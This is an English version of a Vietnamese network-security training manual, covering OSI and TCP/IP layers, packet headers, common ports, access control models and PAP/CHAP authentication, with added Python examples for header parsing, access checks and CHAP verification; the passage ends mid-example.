
TOCBATDAT SECURITY COMPLETE COLLECTION

Security complete collection, Version 1.2, 2012

Page | 1 Copyright by Tocbatdat

Document on Security, Version 1, 2012

CHANGE HISTORY

Version | Update date | Updated by     | Notes
        | 7/2012      | Hoàng Tuấn Đạt | First Release

Document table of contents

I. PURPOSE AND SCOPE OF THE DOCUMENT ... 9
  1. Purpose of the document ... 9
  2. Scope of the document ... 9
II. OVERVIEW OF NETWORK SECURITY (SECURITY OVERVIEW) ... 10
  1. Basic concepts of information security (security) ... 11
  2. Basic networking ... 11
    a. The OSI network model ... 11
    b. The TCP/IP network model ... 17
    c. Comparing the TCP/IP and OSI models ... 19
    d. Structure of IP, TCP, UDP and ICMP packets ... 19
    e. Commonly used ports ... 22
    f. Using a sniffer to analyse IP, ICMP, UDP and TCP packets ... 22
    g. Analysing individual packets and whole connection sessions ... 22
  3. Access control concepts (Access Controls) ... 23
    a. Access Control Systems ... 23
    b. Principles for setting up access control ... 24
    c. Types of access controls ... 24
  4. Authentication concepts ... 27
    a. User identification and authentication factors ... 27
    b. Authentication methods ... 27
  5. Authorization ... 31
    a. Authorization basics ... 31
    b. Authorization methods ... 31
  6. Accounting concepts ... 33
  7. The CIA security triad ... 34
    a. Confidentiality ... 34
    b. Integrity ... 35
    c. Availability ... 35
  8. Basic cryptography ... 36
    a. Basic concepts of cryptography ... 36
    b. Hash functions ... 36
    c. Symmetric encryption ... 37
    d. Asymmetric encryption ... 37
    e. Overview of PKI systems ... 39
    f. Hands-on encryption and decryption with cryptography tools ... 42
  9. Basic concepts of network attacks ... 42
    a. Basic steps of an attack ... 42
    b. Some security concepts ... 44
    c. Basic attack methods ... 44
    d. Objectives of the various attack types ... 45
III. INFRASTRUCTURE SECURITY (AN NINH HẠ TẦNG) ... 47
  1. Solutions and roadmap for building network infrastructure security ... 48
  3. Designing a secure network model ... 50
  4. Routers and switches ... 51
    a. Router functions ... 51
    b. Switch functions ... 52
    c. Switch security ... 52
    d. Router security ... 52
    e. Configuring security on routers ... 53
  5. Firewalls and proxies ... 58
    a. The firewall concept ... 58
    b. Firewall functions ... 58
    c. How a firewall works ... 59
    d. Firewall types ... 60
    e. Firewall design in the network model ... 61
  6. Configuring the iptables firewall on Linux ... 64
  7. Installing and configuring Squid as a proxy server ... 68
    a. Linux Squid proxy server ... 68
    b. Installation ... 68
    c. Configuring Squid ... 70
    d. Starting Squid ... 72
  8. Deploying a VPN on OpenVPN ... 74
    a. OpenVPN overview ... 74
    b. Deploying OpenVPN with SSL on Ubuntu Linux ... 75
  9. Using a VPN to protect Wi-Fi systems ... 82
    a. Wi-Fi security methods ... 82
    b. Configuring the access point and VPN Server 2003 ... 83
    c. Creating VPN connections from devices that access over Wi-Fi ... 95
  10. Intrusion detection and prevention systems (IDS/IPS) ... 100
    a. Packet analysis principles ... 100
    b. Installing and configuring Snort as IDS/IPS ... 104
  11. Installing and configuring Sourcefire IPS ... 111
    a. Features of the Sourcefire IPS ... 111
    b. Typical IDS/IPS deployment model ... 113
    c. How the Sourcefire IDS/IPS works ... 114
    d. Setting management parameters on Sourcefire devices ... 117
    e. Upgrading Sourcefire devices ... 118
    f. Configuring system settings ... 118
    g. Setting up centralised management for Sourcefire devices ... 122
    h. Configuring Interface Sets and the Detection Engine ... 124
    i. Managing and setting IPS policies ... 127
    j. Analysing events and IPS ... 143
  12. Endpoint Security ... 147
    a. The Kaspersky Open Space Security (KOSS) solution ... 147
    b. Features of the Kaspersky Endpoint Security package ... 148
    c. Lab: installing KSC and Endpoint Security on workstations ... 149
  13. Data Loss Prevention ... 149
  14. Network Access Control ... 151
  15. Operating system security ... 154
    a. Securing the Windows operating system ... 154
    b. Lab: using IPsec policy to protect selected applications on Windows ... 156
    c. Protecting the Linux operating system ... 156
  16. Network security policy ... 159
    a. Requirements for building a network security policy ... 159
    b. Overview of the policy-building process ... 159
    c. The ISMS ... 160
    d. The ISO 27000 series ... 161
IV. APPLICATION SECURITY ... 164
  1. Securing the DNS application ... 164
    a. Using a DNS forwarder ... 164
    b. Using a caching DNS server ... 165
    c. Using a DNS advertiser ... 165
    d. Using a DNS resolver ... 166
    e. Protecting the DNS cache ... 166
    f. Securing connections with DDNS ... 166
    g. Disabling zone transfers ... 167
    h. Using a firewall to control DNS access ... 167
    i. Setting access controls on the DNS registry keys ... 167
    j. Setting access controls on DNS system files ... 168
  2. Securing web applications ... 168
    a. Introduction ... 168
    b. Vulnerabilities in web services ... 168
    c. Exploiting operating-system-level vulnerabilities and securing the web server ... 169
    d. Exploiting vulnerabilities in web services ... 171
    e. Exploiting the DoS vulnerability in Apache 2.0.x-2.0.64 and 2.2.x-2.2.19 ... 173
    f. Exploiting vulnerabilities in web applications ... 173
  3. Mail server security ... 175
    a. Overview of SMTP, POP and IMAP ... 175
    b. Attack risks when using email ... 185
  4. Remote access security ... 187
  5. The buffer overflow vulnerability and how to prevent it ... 187
    a. Theory ... 187
    b. Technical description ... 188
    c. Basic example ... 188
    d. Stack buffer overflow ... 188
    e. Example source code ... 189
    f. Exploitation ... 190
    g. Preventing buffer overflows ... 191
    h. Practice ... 194
V. DATA SECURITY ... 194
  1. Database security ... 194
    a. Database security violations ... 195
    b. Database security levels ... 195
    c. Privileges when using a database system ... 196
    d. Views as a protection mechanism ... 197
    e. Granting access privileges ... 198
    f. Audit trails ... 201
  2. Database monitoring and statistics ... 201
  3. Database security methods ... 208
VI. NETWORK ASSESSMENT AND ANALYSIS TOOLS ... 212
  1. Open port scanning skills ... 212
    a. TCP/IP communication principles ... 212
    b. Principles of port scanning a system ... 214
    c. Port scanning with Nmap ... 216
  2. Scanning for OS vulnerabilities ... 219
    a. Using Nmap to scan for OS vulnerabilities ... 219
    b. Using Nessus to scan for OS vulnerabilities ... 220
    c. Using GFI to scan for OS vulnerabilities ... 228
  3. Scanning for web vulnerabilities ... 231
    a. Using Acunetix to scan for web vulnerabilities ... 232
    b. Lab: using IBM AppScan to scan for web vulnerabilities ... 234
  4. Packet analysis and network sniffing techniques ... 234
    a. The nature of sniffers ... 234
    b. A professional data analysis model for enterprises ... 235
    c. Hub environments ... 236
    d. Sniffing techniques in switched environments ... 236
    e. Sniffer model using ARP attack tools ... 239
  5. The Metasploit exploitation tool ... 240
    a. Overview of the Metasploit tool ... 240
    b. Using the Metasploit Framework ... 242
    c. Conclusion ... 248
  6. Using Wireshark and Colasoft to analyse packets ... 248
    d. Using Wireshark to analyse packets and network traffic ... 248
    e. Using Colasoft to analyse network traffic ... 252
VII. CONCLUSION ... 259


Table of terms used in the document

No. | Term     | Full form
1   | ATTT     | An toàn thông tin (information security)
2   | Security | Bảo mật (security)

Some information

I. PURPOSE AND SCOPE OF THE DOCUMENT

1. Purpose of the document
This is a training document on information security for the network operations and administration staff of ABC. It gives learners a complete grounding in the concepts, system models, configuration and deployment of solutions, risk management and other information-security knowledge.

2. Scope of the document
This document was written specifically for the information-security course for ABC staff.

II. OVERVIEW OF NETWORK SECURITY (SECURITY OVERVIEW)

1. Basic concepts of information security (security)
2. Basic networking
3. Access control concepts (Access Controls)
4. Authentication concepts
5. Authorization
6. Accounting concepts
7. The CIA security triad
8. Basic cryptography
9. Basic concepts of network attacks


1. Basic concepts of information security (security)

Several large organisations around the world define Security (information security) as follows:
- Security, or information security, is the degree to which information is protected against the threats of information being disclosed, information losing its integrity, and information becoming unavailable.
- Security, or information security, is the degree of protection against risks to information security such as danger, damage, loss and other crimes. Security is also the form and degree of protection of information, including the structures and processes put in place to raise that protection.

The Institute for Security and Open Methodologies defines Security as a form of protection in which resources are separated from the threats to them.

2. Basic networking
a. The OSI network model
When an application or a service runs to serve users' information-exchange needs, the network operates so that the exchange takes place according to its own rules. Looking at a network cable or a wireless device, a person cannot see the principles by which information is transmitted. To make those principles easy to understand, in support of research, application development and network troubleshooting, the international standards body adopted the OSI model as an ISO standard.
The OSI model (Open Systems Interconnection Reference Model, OSI Model or OSI Reference Model for short), roughly "the reference model for interconnecting open systems", is a layered design that explains in the abstract how computers are interconnected for communication and how the network protocols between them are designed. The model was developed as part of the Open Systems Interconnection initiative started by ISO and ITU-T. It is also known as the OSI seven-layer model. (Source: Wikipedia.)


Purpose of the OSI model:
The OSI model divides the functions of a protocol into a series of layers. Each layer has the property that it uses only the functions of the layer below it and exposes its own functions only to the layer above it. A system that implements protocols as such a series of layers is called a "protocol stack". A protocol stack can be implemented in hardware, in software, or in a combination of the two. Usually only the lower layers are implemented in hardware, and the remaining layers in software.
The OSI model is respected only loosely by the networking and IT industry. Its main feature is that it specifies the interfaces between layers, that is, it specifies how the layers communicate with one another. This means that even when the layers are written and designed by different vendors or companies, they will work together harmoniously once assembled (assuming the specifications have been understood correctly). In the TCP/IP community these specifications are known as RFCs (Requests for Comments). In the OSI community they are ISO standards.
Protocol implementations are usually arranged in layers, mirroring the protocol specification, but there are exceptions, known as "fast paths". In a fast-path design, the most common transactions that the system allows are implemented as a single component in which the functions of several layers are merged into one.
Dividing a protocol's functions sensibly makes it easier to reason about the function and behaviour of protocol stacks, which in turn makes it possible to design stacks that are detailed and thorough yet highly reliable. Each layer performs and provides services to the layer directly above it, and requires the services of the layer directly below it. As noted above, an implementation that spans several layers of the OSI model is usually called a "protocol stack" (for example the TCP/IP protocol stack).
The OSI reference model is a hierarchical structure with seven layers; it defines the requirements for communication between two computers. The model was defined by the International Organization for Standardization in standard number 7498-1 (ISO standard 7498-1). Its purpose is to allow interoperability between the diverse platforms supplied by different vendors. The model lets every component of a network work together regardless of who built it. In the late 1980s ISO recommended implementing the OSI model as a networking standard.
At that time TCP/IP had already been in widespread use for many years. TCP/IP was the foundation of ARPANET and of the other networks that evolved into the Internet. (See RFC 871 for the main differences between TCP/IP and ARPANET.)
Today only part of the OSI model is in use. Many people believe that most of the OSI specifications are too complex and that implementing all of their functions would take far too long, however enthusiastically some people support the OSI model.
Details of the OSI layers:
Layer 1: The physical layer
The physical layer defines all the electrical and physical specifications for devices. These include the layout of connector pins, the voltages, and the cable specifications. Physical-layer devices include hubs, repeaters, network adapters and host bus adapters (HBAs, used in storage area networks). The basic functions and services performed by the physical layer include:
Establishing or terminating an electrical connection with a transmission medium.
Taking part in the process by which communication resources are shared efficiently among many users, for example resolving contention and controlling flow.
Modulation, or conversion between the digital data representation used by user devices and the corresponding signals transmitted over the communication channel.
The parallel SCSI bus operates at this layer. The various Ethernet physical-layer standards also belong to this layer; Ethernet merges the physical layer and the data link layer into one. The same is true of local area networks such as Token Ring, FDDI and IEEE 802.11.
Layer 2: The data link layer (Data Link Layer)
The data link layer provides the functional and procedural means to transfer data between network entities, and to detect and possibly correct errors that occur in the physical layer. Addressing is physical, meaning that the address (the MAC address) is hard-coded into the network card when it is manufactured. This addressing scheme is flat, with no hierarchy. Note: the most typical example is Ethernet. Other examples of data link protocols are HDLC and ADCCP for point-to-point or packet-switched networks, and the Aloha protocol for local area networks. In IEEE 802 local area networks, and in some networks built on other standards such as FDDI, the data link layer may be split into two sublayers: the MAC (Media Access Control) layer and the LLC (Logical Link Control) layer, per the IEEE 802.2 standard.
The data link layer is where bridges and switches operate. Connectivity is provided only between network nodes that are connected to one another within the local network. There is, however, a fairly reasonable argument that these devices actually belong to "layer 2.5" rather than strictly to layer 2.


Layer 3: The network layer (Network Layer)
The network layer provides the functions and procedures for transferring variable-length data sequences from a source to a destination, across one or more networks, while maintaining the quality of service requested by the transport layer. The network layer performs routing. Routers operate at this layer, sending data across the wider network and making internetworking possible (there are also layer-3 switches, also called IP switches). The layer uses a logical addressing scheme whose values are chosen by the network engineer; the scheme is hierarchical. The typical example of a layer-3 protocol is IP.
Layer 4: The transport layer (Transport Layer)
The transport layer provides a dedicated service for transferring data between end users, so that the upper layers need not concern themselves with providing reliable, efficient data transfer. The transport layer controls the reliability of a given connection. Some protocols are state- and connection-oriented, which means the transport layer can track packets and retransmit those that fail. A typical example of a layer-4 protocol is TCP. This is the layer at which messages are turned into TCP or UDP packets. At layer 4, addressing is by port number; ports are what distinguish the communicating applications from one another.
Layer 5: The session layer (Session layer)
The session layer controls the dialogues (sessions) between computers. It establishes, manages and terminates connections between the local application and the remote application. It also supports full-duplex, half-duplex or simplex operation, and sets up checkpointing procedures that speed up recovery when an error occurs, because a completed point has already been marked, as well as adjournment, termination and restart. The OSI model assigns to this layer the responsibility for the "graceful close" of sessions (a property of the TCP transport protocol) and for session checking and recovery, a part that is generally not used in the TCP/IP protocol suite.


Layer 6: The presentation layer (Presentation layer)
The presentation layer acts as the data layer on the network. On the sending computer it translates the data handed down from the Application layer into a common format, and on the receiving computer it converts that common format back into the Application layer's format. The presentation layer performs the following functions: - translating character codes, for example from ASCII to EBCDIC; - converting data, for example from integers to floating-point numbers; - compressing data to reduce the amount transmitted over the network; - encrypting and decrypting data to provide confidentiality on the network.
Layer 7: The application layer (Application layer)
The application layer is the layer closest to the user. It provides the means for users to access information and data on the network through application programs. This layer is the main interface through which the user interacts with application programs, and through them with the network. Examples of applications at this layer include Telnet, the file transfer protocol FTP, the mail transfer protocol SMTP, HTTP, and X.400 remote mail.
An easy-to-follow illustration of the OSI model alongside real-world forms of information exchange:


b. The TCP/IP model

TCP/IP (the Internet protocol suite, IP suite or TCP/IP protocol suite) is the set of
communication protocols that implements the protocol stack on which the Internet and
most commercial computer networks run. The suite is named after its two main protocols,
TCP (Transmission Control Protocol) and IP (Internet Protocol), which were also the
first two protocols to be defined.
Like many other protocol suites, TCP/IP can be viewed as a set of layers, each layer
solving a set of problems related to the transmission of data and providing a
well-defined service to the layer above it, built on the services of the layers below.
Logically, the upper layers are closer to the user and work with more abstract data;
they rely on the lower layers to transform that data into a form that can finally be
transmitted physically.


The OSI model describes a fixed set of 7 layers that some manufacturers have adopted,
and it can be compared roughly with the TCP/IP suite. The comparison can either cause
confusion or bring a deeper understanding of the TCP/IP suite.
Application layer:
Includes the application protocols DNS, TFTP, TLS/SSL, FTP, HTTP, IMAP, IRC, NNTP,
POP3, SIP, SMTP, SNMP, SSH, TELNET, ECHO, BitTorrent, RTP, PNRP, rlogin, ENRP, ...
Routing protocols such as BGP and RIP, which for various reasons run over TCP and UDP
respectively (BGP uses TCP, RIP uses UDP), can also be considered part of either the
application layer or the network layer.
Transport layer:
Includes the protocols TCP, UDP, DCCP, SCTP, IL, RUDP, ...
Routing protocols such as OSPF (Open Shortest Path First), which run over IP, can also
be considered part of the transport layer or of the network layer. ICMP (Internet
Control Message Protocol) and IGMP (Internet Group Management Protocol) run over IP and
can be considered part of the network layer.
Network layer:
Protocols: IP (IPv4, IPv6). ARP (Address Resolution Protocol) and RARP (Reverse Address
Resolution Protocol) operate below IP but above the link layer, so they can be said to
sit between the two layers.

Link layer:

Includes the protocols Ethernet, Wi-Fi, Token Ring, PPP, SLIP, FDDI, ATM, Frame Relay,
SMDS, ...

c. Comparing the TCP/IP and OSI models

The TCP/IP model is simpler than the OSI model yet still captures the communication
process on the network. The TCP/IP model is divided into 4 layers:
OSI Model                 TCP/IP Model
7. Application            4. Application
6. Presentation
5. Session
4. Transport              3. Transport
3. Network                2. Internet
2. Data Link              1. Network Access
1. Physical

d. Structure of IP, TCP, UDP and ICMP packets

To do security research one has to understand the packet structure at each layer in
order to understand and analyse packets.

Encapsulation of data across the layers of the TCP/IP model:


Structure of an IPv4 packet
An IPv4 packet consists of a Header and Data. The header is 160 or 192 bits long and
the rest is Data. The address fields are 32 bits each.

Structure of an IPv6 packet:
An IPv6 packet also consists of two parts, Header and Data. The packet header is 40
octets (320 bits), of which the IPv6 addresses are 128 bits each.

Structure of a TCP packet:

A TCP packet consists of two parts, Header and Data; the header is 192 bits.
The three steps that open a TCP connection (three-way handshake):
+ Step I: the client sends the server a SYN packet.
+ Step II: the server replies to the client with a SYN/ACK packet.
+ Step III: when the client receives the SYN/ACK it sends the server an ACK packet, and
the exchange of data between the two hosts begins.
The four steps that close a TCP connection:
+ Step I: the client sends the server a FIN/ACK packet.
+ Step II: the server sends the client an ACK packet.
+ Step III: the server in turn sends the client a FIN/ACK packet.
+ Step IV: the client sends the server an ACK packet, and the connection between server
and client is torn down.
Structure of a UDP packet:
A UDP packet consists of two parts, Header and Data; the header is 64 bits.


Structure of an ICMP packet

Type (8 bits) [8 bits identifying the ICMP message type]

Code (8 bits) [each Type can have its own specific codes describing the message]

Checksum (16 bits) [16-bit checksum]

Message (variable length) [depends on the type and code]
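As an added example (not code from the original document), the following Python script decodes the headers described above with the standard library only: the fixed 20-byte IPv4 header, the 20-byte TCP header with its flag bits, the 8-byte UDP header and the 4-byte fixed part of ICMP. It then checks that a sequence of constructed packets really is the SYN, SYN/ACK, ACK handshake described in the TCP section. The addresses, ports and packets are constructed for the demonstration and checksums are left at zero, which a real stack would reject.

```python
import ipaddress
import struct

# Header sizes from the text: IPv4 fixed header 20 bytes (160 bits), TCP fixed header
# 20 bytes, UDP header 8 bytes (64 bits), ICMP fixed part 4 bytes (type, code, checksum).
PROTO_ICMP, PROTO_TCP, PROTO_UDP = 1, 6, 17
TCP_FLAGS = [(0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"), (0x08, "PSH"), (0x10, "ACK")]


def parse_ipv4(pkt: bytes) -> dict:
    """Decode the fixed IPv4 header and return its fields plus the layer-4 payload."""
    if len(pkt) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, total_len, _ident, _frag, ttl, proto, _csum, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", pkt[:20])
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4   # IHL counts 32-bit words
    if version != 4 or ihl < 20 or total_len < ihl or len(pkt) < total_len:
        raise ValueError("malformed IPv4 packet")
    return {"header_len": ihl, "ttl": ttl, "proto": proto,
            "src": str(ipaddress.IPv4Address(src)), "dst": str(ipaddress.IPv4Address(dst)),
            "payload": pkt[ihl:total_len]}


def parse_tcp(seg: bytes) -> dict:
    """Decode the fixed TCP header; flags come back as e.g. 'SYN/ACK' or 'FIN/ACK'."""
    if len(seg) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, off_flags, win, _csum, _urg = struct.unpack("!HHIIHHHH", seg[:20])
    flag_bits = off_flags & 0x01FF
    names = [n for bit, n in TCP_FLAGS if flag_bits & bit]
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack, "window": win,
            "header_len": (off_flags >> 12) * 4, "flags": "/".join(names)}


def parse_udp(seg: bytes) -> dict:
    """Decode the 8-byte UDP header; 'length' covers header plus data."""
    if len(seg) < 8:
        raise ValueError("truncated UDP header")
    sport, dport, length, _csum = struct.unpack("!HHHH", seg[:8])
    return {"sport": sport, "dport": dport, "length": length, "data": seg[8:length]}


def parse_icmp(msg: bytes) -> dict:
    """Decode the ICMP type, code and checksum; the rest is the variable message."""
    if len(msg) < 4:
        raise ValueError("truncated ICMP header")
    typ, code, _csum = struct.unpack("!BBH", msg[:4])
    return {"type": typ, "code": code, "message": msg[4:]}


# Builders used only to construct the sample packets below (checksums left at zero).
def build_ipv4(proto: int, payload: bytes, src: str, dst: str) -> bytes:
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 1, 0, 64, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return hdr + payload


def build_tcp(sport: int, dport: int, flags: int, seq: int = 0, ack: int = 0) -> bytes:
    # data offset 5 words (20 bytes), window 65535, checksum and urgent pointer 0
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | flags, 65535, 0, 0)


def handshake_order(pkts: list) -> list:
    """Return the TCP flag string of each packet, e.g. ['SYN', 'SYN/ACK', 'ACK']."""
    return [parse_tcp(parse_ipv4(p)["payload"])["flags"] for p in pkts]


def is_three_way_handshake(pkts: list) -> bool:
    return handshake_order(pkts) == ["SYN", "SYN/ACK", "ACK"]


# Constructed three-way handshake between 10.0.0.1:40000 and 10.0.0.2:80.
CLIENT, SERVER = "10.0.0.1", "10.0.0.2"
HANDSHAKE = [
    build_ipv4(PROTO_TCP, build_tcp(40000, 80, 0x02, seq=100), CLIENT, SERVER),
    build_ipv4(PROTO_TCP, build_tcp(80, 40000, 0x12, seq=500, ack=101), SERVER, CLIENT),
    build_ipv4(PROTO_TCP, build_tcp(40000, 80, 0x10, seq=101, ack=501), CLIENT, SERVER),
]
# Constructed UDP datagram to the DNS port and an ICMP echo request (type 8, code 0).
UDP_PKT = build_ipv4(PROTO_UDP, struct.pack("!HHHH", 53000, 53, 8 + 5, 0) + b"query",
                     CLIENT, SERVER)
ICMP_PKT = build_ipv4(PROTO_ICMP, struct.pack("!BBH", 8, 0, 0) + b"\x00\x01\x00\x01ping",
                      CLIENT, SERVER)

if __name__ == "__main__":
    print(handshake_order(HANDSHAKE))                      # ['SYN', 'SYN/ACK', 'ACK']
    print(parse_udp(parse_ipv4(UDP_PKT)["payload"]))
    print(parse_icmp(parse_ipv4(ICMP_PKT)["payload"]))
```

The same decoders can be pointed at the bytes Wireshark exports from a capture (after stripping the Ethernet frame), which is a useful way to check by hand what the sniffer shows in the practice sessions below.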

e. Commonly used ports

So that many services can communicate at the same time over one connection, each
service is assigned a particular port. When studying security we should also know the
commonly used ports:
Protocol         Port
FTP              20/21
SSH              22
Telnet           23
SMTP             25
DNS              53
TFTP             69
HTTP             80
POP3             110
SNMP             161/162
HTTPS            443
SMB              445
NetBIOS          135,137,139
VPN              1723,500
Remote Desktop   3389

f. Using a sniffer to analyse IP, ICMP, UDP and TCP packets
Practice: install Wireshark and Colasoft to analyse packets.

g. Analysing individual packets and whole connection sessions

Practice: install Wireshark and Colasoft to analyse packets.


3. The concept of access control (Access Controls).

Before being granted any permissions, everyone accesses the system as the Anonymous
user. After the user is authenticated (Authentication) the system grants them
permission to use resources (Authorization), and the whole of the user's access is
monitored and logged (Accounting).

a. Access Control Systems

A resource may only be accessed by authenticated individuals. Managing a user's access
to resources goes through these steps:
- Identification: the process of identifying the user; the user supplies information
for the system to identify them.
- Authentication: the step of verifying the user; the user supplies information
confirming their identity and the system verifies it by one of several methods.
- Authorization: the permission to access resources that the system grants the user
after Authentication.
- Accounting: the system monitors and records the user's access to the resource areas.
Every access control system must have three basic elements:
- Subjects: all the entities that can be assigned access rights; in a system these are
the Users/Groups.
- Objects: the resources being used.
- Access Permissions: used to grant Subjects access rights to Objects (for example a
User is a Subject, a folder is an Object, and the Permission is the right granted to the
User to access the Folder). The table of Access Permissions for one object is called
its Access Control List (ACL); the ACLs of the whole system are listed as Access Control
Entries (ACEs).


b. Principles for setting up Access Control

Whoever writes the security policy must lay down principles for administering system
resources that ensure both the best protection of the resources and that users can
still do their jobs. The principles are:
- Principle of Least Privilege: users (Subjects) are granted the minimum permissions on
resources (Objects) that still let them do their jobs.
- Principle of Separation of Duties and Responsibilities: important systems must be
divided into separate components so that control can be delegated sensibly.
- Principle of Need to Know: users only access the resource areas they need and
understand, enough to do their jobs.

c. Types of Access Control

Resources come in many forms and users are many kinds of entity, so we need to use the
appropriate form of access control for the data.
- Mandatory Access Control (MAC)
+ A rule-based control method for assigning access rights to entities.
+ Rights are assigned to entities on the basis of dividing resources into different
classes (resource classification).
+ This access control method is usually applied in government organisations and
companies.
+ Example: in a brewery the resource areas are divided into Public (the website),
Private (accounting data) and Confidential (the beer recipe). Each resource area has its
own set of entities allowed to access it, and this form of access control is Mandatory
Access Control.


- Discretionary Access Control (DAC)
+ Users (Subjects) are controlled through ACLs.
+ Access to data can be divided into different levels (for example NTFS Permissions,
where Users/Groups are granted levels such as Full control, Modify and Read).
+ Access Control Lists can be used when granting permissions on resources, or on
routers and firewalls. Access control that uses ACLs is Discretionary Access Control.

The NTFS Permission Access Control List (figure in the original).

- Role-Based Access Control
+ The administrator assigns rights to a user based on the user's role. A user's rights
are the tasks the user may perform on the system.
+ For example the administrator can grant a User the rights Shutdown, change network
settings, remote desktop, backup and others according to the user's role.
+ In Microsoft Windows this form of access control corresponds to assigning User
Rights.
+ Example: the User Rights settings of a Microsoft system (figure in the original).
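As an added example (not code from the original document), the following Python script models the three access control types described above side by side: MAC as a clearance-versus-classification rule using the brewery's Public/Private/Confidential levels, DAC as an NTFS-style ACL of Allow and Deny entries where an explicit Deny wins, and RBAC as rights attached to roles. The users, groups, roles and rights are hypothetical and constructed for the demonstration.

```python
from dataclasses import dataclass

# MAC: subjects have a clearance, resources a classification (levels from the text's
# brewery example). A subject may read an object only if clearance >= classification.
LEVELS = {"Public": 0, "Private": 1, "Confidential": 2}


def mac_can_read(clearance: str, classification: str) -> bool:
    return LEVELS[clearance] >= LEVELS[classification]


# DAC: each object carries an ACL made of ACEs naming a user or a group.
# As in NTFS, an explicit Deny entry overrides any Allow entry, and an object
# with no matching entry at all is implicitly denied.
@dataclass(frozen=True)
class ACE:
    principal: str          # user or group name
    allow: bool             # True = Allow ACE, False = Deny ACE
    perms: frozenset        # e.g. {"read", "modify"}


def dac_check(acl: list, user: str, groups: set, perm: str) -> bool:
    principals = {user, *groups}
    matching = [ace for ace in acl if ace.principal in principals and perm in ace.perms]
    if any(not ace.allow for ace in matching):
        return False                                # deny wins
    return any(ace.allow for ace in matching)       # nothing matched -> implicit deny


# RBAC: rights (the Windows "User Rights" of the text) are attached to roles,
# and users are assigned roles rather than individual rights.
ROLE_RIGHTS = {
    "Administrator": {"shutdown", "change_network_settings", "remote_desktop", "backup"},
    "BackupOperator": {"backup"},
    "RemoteUser": {"remote_desktop"},
}


def rbac_has_right(user_roles: dict, user: str, right: str) -> bool:
    return any(right in ROLE_RIGHTS.get(role, set()) for role in user_roles.get(user, ()))


# Constructed sample data (hypothetical users, not from the original document).
CLEARANCE = {"web_editor": "Public", "accountant": "Private", "brewmaster": "Confidential"}
RECIPE_ACL = [
    ACE("Brewers", True, frozenset({"read", "modify"})),
    ACE("Everyone", True, frozenset({"read"})),
    ACE("contractor", False, frozenset({"read"})),   # explicit deny for one user
]
USER_ROLES = {"alice": ["BackupOperator"], "bob": ["RemoteUser", "BackupOperator"]}

if __name__ == "__main__":
    print(mac_can_read(CLEARANCE["accountant"], "Confidential"))       # False
    print(dac_check(RECIPE_ACL, "contractor", {"Everyone"}, "read"))    # False, deny wins
    print(rbac_has_right(USER_ROLES, "bob", "remote_desktop"))         # True
```

The deny-overrides rule in dac_check is the point to remember when reading an NTFS ACL: a user who is a member of a group with Full control is still locked out by a single Deny entry naming them.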

Access Control can also be divided into two forms:
- Centralized Access Control (CAC)


Authentication and the granting of permissions are performed centrally for the whole
system. Three commonly used centralized access control methods are:
+ Remote Authentication Dial-In User Service (RADIUS)
+ Terminal Access Controller Access Control System (TACACS)
+ Active Directory
- Decentralized Access Control Systems (DACS)
A control method consisting of several different CACs within one organisation,
integrated into different systems without regard to hardware or software.
Based on the actions taken on the system, Access Control can also be divided into:
+ Administrative Controls

4. The concept of Authentication

a. Factors for identifying and authenticating users
User authentication methods rely on these basic factors:
- Something you KNOW: based on something you know (e.g. username/password)
- Something you HAVE: based on something you have (e.g. to withdraw cash from an ATM
you must have the card)
- Something you ARE: based on something you are (e.g. fingerprint, voice)

b. Authentication methods

In practice there are many methods of authenticating users in IT, and each may suit one
or more different services. Below I present some authentication methods commonly used
in IT.
- PAP - Password Authentication Protocol

PAP is used by remote users who need to authenticate over PPP connections. PAP provides
the ability to identify and authenticate users when they connect from a remote system.
This authentication protocol requires the user to enter a password before being
authenticated. The username and password are sent over the network after the PPP
connection has been established. The authentication server holds the authentication
data; when the user enters their credentials they are sent to this server. The entire
username/password pair travels over the network without any encryption (cleartext).
- CHAP - Challenge Handshake Authentication Protocol
CHAP is an authentication method created to overcome the weaknesses and vulnerabilities
of PAP. CHAP uses a challenge/response method to authenticate the user. When a user
wants to set up a PPP connection, both sides must agree to use CHAP. The challenge is
encrypted using the password and an encryption key. CHAP's operation is described in
the model below:
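As an added example (not code from the original document), the Python script below contrasts the two methods just described: a PAP request carries the password itself, while the CHAP exchange uses the MD5 scheme of RFC 1994, Response = MD5(Identifier || secret || Challenge), so the shared secret never appears on the wire and a fresh random challenge makes a captured response useless later. The usernames, secrets and the ChapAuthenticator class are hypothetical and constructed for the demonstration.

```python
import hashlib
import hmac
import os


def pap_authenticate_request(username: str, password: str) -> bytes:
    """PAP: the password itself travels in the Authenticate-Request (cleartext)."""
    return username.encode() + b":" + password.encode()


def chap_response(ident: int, secret: bytes, challenge: bytes) -> bytes:
    """CHAP with MD5 (RFC 1994): Response = MD5(Identifier || secret || Challenge)."""
    return hashlib.md5(bytes([ident]) + secret + challenge).digest()


class ChapAuthenticator:
    """Server side: issues fresh random challenges and verifies the peer's response."""

    def __init__(self, secrets: dict):
        self._secrets = secrets       # username -> shared secret (never sent on the wire)
        self._pending = {}            # username -> (ident, challenge) awaiting a response
        self._next_ident = 0

    def challenge(self, username: str) -> tuple:
        ident = self._next_ident
        self._next_ident = (self._next_ident + 1) % 256      # 8-bit Identifier field
        chal = os.urandom(16)         # unpredictable, so an old response cannot be replayed
        self._pending[username] = (ident, chal)
        return ident, chal

    def verify(self, username: str, ident: int, response: bytes) -> bool:
        pending = self._pending.pop(username, None)          # one response per challenge
        secret = self._secrets.get(username)
        if pending is None or secret is None or pending[0] != ident:
            return False
        expected = chap_response(ident, secret, pending[1])
        return hmac.compare_digest(expected, response)       # constant-time comparison


def chap_exchange(auth: ChapAuthenticator, username: str, peer_secret: bytes) -> bool:
    """Run one full challenge/response exchange and return whether the peer was accepted."""
    ident, chal = auth.challenge(username)              # Challenge packet (server -> peer)
    resp = chap_response(ident, peer_secret, chal)      # Response packet (peer -> server)
    return auth.verify(username, ident, resp)           # Success/Failure packet


# Constructed sample credentials for the demonstration.
SECRETS = {"remote-user": b"correct horse battery staple"}

if __name__ == "__main__":
    auth = ChapAuthenticator(SECRETS)
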